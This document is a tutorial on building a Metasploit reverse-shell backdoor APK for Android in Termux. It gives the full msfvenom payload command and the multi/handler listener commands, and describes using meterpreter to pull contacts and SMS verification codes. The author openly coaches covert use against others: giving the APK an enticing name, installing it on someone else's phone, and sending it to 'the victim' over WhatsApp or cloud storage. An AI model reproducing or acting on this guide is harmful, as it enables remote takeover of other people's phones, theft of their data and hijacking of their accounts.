How to make a backdoor is a tutorial that you must learn if you want to learn to be a beginner hacker. Because with a backdoor we can control Android, Windows and other OS.
It’s just that the drawback of the backdoor is that the program is easy to detect. Like on Android, if it is an application that is considered dangerous, it certainly cannot be installed.
Therefore, I have also written tips to overcome them. That is, we must be able to insert a backdoor into other applications so that the Android operating system can be tricked.
On this occasion I will share a tutorial using metasploit tools that are run from the termux android application. Please see the following steps.
How to Create a Termux Metasploit Backdoor
Metasploit is a popular and proven hacking tool. We will use this tool in termux application to create a backdoor application.
But before that, please install metasploit first with the command:
pkg install unstable-repo pkg install metasploit
For those who have problems with the installation, try reading the following guide on how to install metasploit.
Next, run metasploit and enter the command to create a backdoor application.
Here’s the process of creating a metasploit backdoor
1. Run the metasploit tool from termux
Open the termux application and enter the following metasploit launch command:
msfconsole
Wait until the termux screen changes as shown below.

That is a sign that the metasploit tools are running and ready to receive commands.
2. Enter the command create playload
The playload command must be set manually. For example in the IP address, storage, backdoor apk name, etc.
For example, please enter the following command line:
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /sdcard/backdoor.apk
Information :
– Replace LHOST with your ip
– Port can use 4444 or 8080
– backdoor.apk is the name of the application to be created. Just replace it with a name that makes other people want to install it (example: simont*k.apk) wkwk
Wait until the playload is successfully created.
How to find out whether it has been completed or not, you can check android storage. If there is an apk file with the name backdoor, that means it worked.

So far, we have successfully created the metasploit backdoor application. But it still can’t be used to control other people’s androids.
We have to enter the Exploit command again so that the backdoor can be active.
3. Enter the Exploit command
In order to enter exploit commands, the backdoor apk must be installed on android. For the experiment, you can install it on your own cellphone or borrow briefly from a friend.
Then please go back to the metasploit tools that are running on termux. If it’s stopped, enter the command msfconsole in order to re-enter.
Write the 5 Exploit command lines below:
use multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.1.101 set lport 4444 exploit
Lhost and Lport are the same as the ones you use when creating a backdoor.
Then wait until the termux screen changes as shown below:

That is a sign that the backdoor is active.
Please install it on someone else’s cellphone and re-enter the exploit command to activate it.
4. Enter the meterpreter command (bonus)
When the backdoor is active, the thing to do is enter the metasploit command for hacking purposes.
For example, if you want to see the specifications of a cellphone that has a backdoor installed, then use the command sysinfo. Then the specifications such as what android, what Rom will appear.
Posted by tapping whatsapp termux, I have also demonstrated the use of meterpreter to get an SMS verification code.
Another example, if you want to get a copy of the contact from the victim’s cellphone, you can enter the command dump_contact.
Okay, for other commands, please look for the appropriate meterpreter commands yourself.
I think the above explanation is sufficient to create and operate a backdoor. Then maybe just discuss the problems that often occur.
Problem When Creating Backdoor
The following are problems that are often asked when creating a backdoor in termux.
1. Bro my android is not using the sdcard, how?
No problem, sdcard in termux means android internal storage. Even though Android uses an SD card, this file will still be stored internally.
2. An error occurred during the manufacturing process, what is the solution?
See the error that appears, if there is the word “access denied” it means that termux does not have permission to access storage.
The solution is to give termux permission access via settings or typing commands termux-setup-storage and select allow.
3. Can’t install metasploit and stops at 98%
This is not an error, but it will indeed stack at 98%. If your internet connection is smooth, just wait until the process is complete.
When finished enter the command msfconsole and if it doesn’t work then this is called an error. The solution is to clear termux data and repeat the process from the beginning.
4. How to send a backdoor to the victim?
Submit as usual when you send files. It can be via whatsapp, fb or you can upload it to online storage such as Gdrive, mediafire and then ask the victim to download it.
Well, until here we have learned how to create a backdoor using termux on android.
And if concluded, the process of creating a backdoor is to install metasploit and enter the code/command to create the playload file.
For computer users, you can also take advantage of Kali Linux, but the way to install Metasploit will be different.
Okay, for those who have problems, you can ask through the comments column or just join the cyber newbie group to get more service. haha